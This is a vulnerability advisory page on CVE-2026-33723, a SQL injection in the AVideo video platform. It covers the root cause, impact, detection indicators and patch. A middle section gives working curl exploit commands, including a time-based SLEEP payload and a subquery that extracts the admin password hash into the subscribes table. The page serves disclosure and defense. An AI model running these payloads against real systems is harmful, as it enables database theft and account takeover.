
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33723 is a SQL injection vulnerability in WWBN AVideo, an open source video platform, affecting all versions up to and including 26.0. The flaw resides in the Subscribe::save() method in objects/subscribe.php, where the $this->users_id property — sourced directly from $_POST['user_id'] — is concatenated into an INSERT SQL query without sanitization or parameterized binding. An authenticated attacker can exploit this to extract arbitrary data from any database table. It was published on March 23, 2026, with a patch committed the same day. The CVSS v3.1 base score is 7.1 (High) per the GitHub Advisory, or 6.5 (Medium) per NVD (Github Advisory, AVideo Advisory).
The root cause (CWE-89: SQL Injection) stems from a disconnect between where intval() is applied and where the value is used in SQL. The Subscribe constructor stores the raw $_POST['user_id'] value into $this->users_id without sanitization; while getSubscribeFromID() applies intval() to local copies, it does not affect the object property. When the attacker targets a user_id they have not previously subscribed to, loadFromId() returns false, leaving $this->id null and $this->users_id containing the unsanitized payload. The save() method then takes the INSERT code path, directly concatenating the tainted value into the SQL string, and sqlDAL::writeSql() — called without format/value parameters — passes the already-injected string straight to mysqli->prepare() and execute() with no binding protection. Both subscribe.json.php and subscribeNotify.json.php serve as entry points (AVideo Advisory, Patch Commit).
Successful exploitation grants an authenticated attacker full read access to all database tables, enabling exfiltration of user password hashes (users.pass), admin credentials, encryption salts, API keys, and personal data such as email addresses. Additionally, the attacker can insert arbitrary rows into the subscribes table, compromising data integrity. The vulnerability does not directly impact availability, but stolen admin credentials or API keys could facilitate further account takeover or lateral movement within the platform (AVideo Advisory, Github Advisory).
A proof-of-concept exploit is publicly available in the GitHub Security Advisory, providing concrete curl commands demonstrating both time-based blind SQL injection and data exfiltration via INSERT subqueries. Exploitation requires only a valid authenticated session (low-privilege account), making it accessible to any registered user. The EPSS score is approximately 0.019–0.029% (9th percentile), indicating low but non-zero probability of near-term exploitation. There is no current evidence of in-the-wild exploitation, no known threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog (AVideo Advisory, Github Advisory).
Obtain an authenticated session: Register or log in to the target AVideo instance with any valid user account. Capture the PHPSESSID cookie value from the browser or via a login request.
Identify a non-subscribed user_id: Choose a user_id value (e.g., 99999) that the current account has NOT previously subscribed to. This ensures loadFromId() returns false, keeping $this->id null and routing execution to the vulnerable INSERT path.
Confirm injection with time-based blind SQLi: Send a crafted POST request to /objects/subscribe.json.php with a SLEEP(5) payload in the user_id parameter. A ~5-second response delay confirms the injection is active:
curl -s -o /dev/null -w "%{time_total}" \
-b 'PHPSESSID=VALID_SESSION_ID' \
-d "user_id=99999'+AND+SLEEP(5)+AND+'1" \
https://target/objects/subscribe.json.phpusers table and writes it into the email column of the subscribes table:curl -b 'PHPSESSID=VALID_SESSION_ID' \
-d "user_id=99999',(SELECT+pass+FROM+users+WHERE+isAdmin=1+LIMIT+1),'a','1.1.1.1',now(),now(),'1');%23" \
https://target/objects/subscribe.json.phpThis closes the VALUES clause with attacker-controlled data and comments out the remainder of the query.
Retrieve exfiltrated data: Query any endpoint that reads from the subscribes table and returns the email field (e.g., getAllSubscribes()). The injected row will contain the admin password hash in the email column.
Repeat against second endpoint: The same attack applies to /objects/subscribeNotify.json.php using the identical user_id parameter, providing a second exploitation vector (AVideo Advisory).
/objects/subscribe.json.php or /objects/subscribeNotify.json.php containing SQL metacharacters (single quotes, SLEEP, SELECT, INSERT, %23/#) in the user_id parameter body; abnormally slow HTTP responses (~5+ seconds) to these endpoints suggesting time-based blind SQLi.subscribe.json.php or subscribeNotify.json.php with encoded or suspicious user_id values; application/PHP error logs showing SQL syntax errors or unexpected query structures from the subscribes table operations.subscribes table where the email column contains values resembling password hashes (e.g., bcrypt or MD5 strings), IP addresses like 1.1.1.1, or other non-email data; queries to users table filtered by isAdmin=1 originating from the subscribe code path.getAllSubscribes()) returning rows with non-email content in the email field, which may indicate exfiltrated data staged for retrieval (AVideo Advisory).The recommended fix is to apply commit 36dfae22059fbd66fd34bbc5568a838fc0efd66c, which refactors the Subscribe::save() method to use parameterized prepared statements for both the INSERT and UPDATE paths, and applies intval() to $this->users_id and $this->subscriber_users_id. As a minimal interim fix, applying intval($user_id) in the Subscribe constructor before assigning to $this->users_id prevents injection. Additional workarounds include deploying WAF rules to detect and block SQL injection patterns in POST bodies targeting subscribe.json.php and subscribeNotify.json.php, and restricting access to these endpoints to trusted users where possible. Upgrade to a version of AVideo beyond 26.0 that includes the patch (AVideo Advisory, Patch Commit).
The vulnerability was published by the AVideo maintainer (DanielnetoDotCom) directly via GitHub Security Advisories on March 23, 2026, with a patch committed the same day, indicating a responsible disclosure and rapid vendor response. The advisory was noted on Bluesky and aggregated by several CVE tracking services shortly after publication. No significant independent researcher commentary or major media coverage has been identified beyond standard CVE database entries (AVideo Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."